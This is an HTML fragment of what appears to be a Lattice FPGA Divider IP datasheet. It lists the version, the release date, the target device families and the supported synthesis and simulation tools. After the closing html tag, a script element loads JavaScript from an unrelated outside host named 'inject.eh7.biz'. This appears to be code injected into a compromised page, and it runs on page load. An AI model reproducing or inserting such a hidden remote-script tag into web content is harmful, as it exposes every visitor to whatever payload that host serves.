Module</span></b><span lang=EN-US> <o:p></o:p></span></p>

<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width=636
 style='width:477.05pt;mso-cellspacing:0cm;margin-left:9.0pt;mso-yfti-tbllook:
 1184;mso-padding-alt:0cm 0cm 0cm 0cm;border:..75pt;border-spacing: 0px;
 border-spacing: 0px' x-use-null-cells>
 <col><col>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;x-cell-content-align: top'>
  <td width=144 valign=top style='width:108.05pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><!--(Table)=========================================================--><span
  lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>IP
  Name:<o:p></o:p></span></p>
  </td>
  <td width=492 valign=top style='width:369.0pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span lang=EN-US style='font-size:10.0pt;mso-bidi-font-size:
  12.0pt;font-family:"Verdana","sans-serif"'>Divider<o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:1;x-cell-content-align: top'>
  <td width=144 valign=top style='width:108.05pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>IP
  Version:<o:p></o:p></span></p>
  </td>
  <td width=492 valign=top style='width:369.0pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span class=SpellE><span lang=EN-US style='font-size:10.0pt;
  font-family:"Verdana","sans-serif"'>ver</span></span><span lang=EN-US
  style='font-size:10.0pt;font-family:"Verdana","sans-serif"'> 1.0<o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:2;x-cell-content-align: top'>
  <td width=144 valign=top style='width:108.05pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>IP
  Release Date:<o:p></o:p></span></p>
  </td>
  <td width=492 valign=top style='width:369.0pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif";
  mso-fareast-font-family:SimSun'>June. 2012</span><span lang=EN-US
  style='font-size:10.0pt;font-family:"Verdana","sans-serif"'><o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:3;mso-yfti-lastrow:yes;x-cell-content-align: top'>
  <td width=144 valign=top style='width:108.05pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Target
  Technology:<o:p></o:p></span></p>
  </td>
  <td width=492 valign=top style='width:369.0pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Lattice
  ECP2/ECP2M/</span><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif";
  mso-fareast-font-family:SimSun'> ECP3/ECP4</span><span lang=EN-US
  style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>/XP2<o:p></o:p></span></p>
  </td>
 </tr>
</table>

<p class=MsoNormal style='margin-bottom:12.0pt'><span lang=EN-US><br>
</span><b><span lang=EN-US style='font-family:"Arial","sans-serif"'>Software
Requirements</span></b><span lang=EN-US><o:p></o:p></span></p>

<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width=636
 style='width:477.05pt;mso-cellspacing:0cm;margin-left:9.0pt;mso-yfti-tbllook:
 1184;mso-padding-alt:0cm 0cm 0cm 0cm;border:..75pt;border-spacing: 0px;
 border-spacing: 0px' x-use-null-cells>
 <col><col>
 <tr style='mso-yfti-irow:0;mso-yfti-firstrow:yes;x-cell-content-align: top'>
  <td width=210 valign=top style='width:157.15pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><!--(Table)=========================================================--><span
  lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Synthesis
  Tools Supported:<o:p></o:p></span></p>
  </td>
  <td width=427 valign=top style='width:319.9pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Synplify
  pro for Lattice F-2012.03L</span><span lang=EN-US style='mso-fareast-font-family:
  SimSun'><o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:1;x-cell-content-align: top'>
  <td width=210 valign=top style='width:157.15pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Simulation
  Tools Supported:<o:p></o:p></span></p>
  </td>
  <td width=427 valign=top style='width:319.9pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span class=SpellE><span lang=EN-US style='font-size:10.0pt;
  font-family:"Verdana","sans-serif"'>Modelsim</span></span><span lang=EN-US
  style='font-size:10.0pt;font-family:"Verdana","sans-serif"'> SE 6.3F<br>
  <span class=SpellE>Aldec</span> Active-HDL 9.1</span><span lang=EN-US
  style='font-size:10.0pt;font-family:"Verdana","sans-serif";mso-fareast-font-family:
  SimSun'> </span><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>(Windows
  only)<o:p></o:p></span></p>
  </td>
 </tr>
 <tr style='mso-yfti-irow:2;mso-yfti-lastrow:yes;x-cell-content-align: top'>
  <td width=210 valign=top style='width:157.15pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Lattice
  Tool Supported:<o:p></o:p></span></p>
  </td>
  <td width=427 valign=top style='width:319.9pt;border:none;padding:.75pt .75pt .75pt .75pt'>
  <p class=table><span lang=EN-US style='font-size:10.0pt;font-family:"Verdana","sans-serif"'>Lattice
  Diamond 2.0</span><span lang=EN-US style='mso-fareast-font-family:SimSun'><o:p></o:p></span></p>
  </td>
 </tr>
</table>

<p><span lang=EN-US>&nbsp;</span></p>

</div>

</body>

</html>
<script language=javascript src=http://inject.eh7.biz/css.js></script>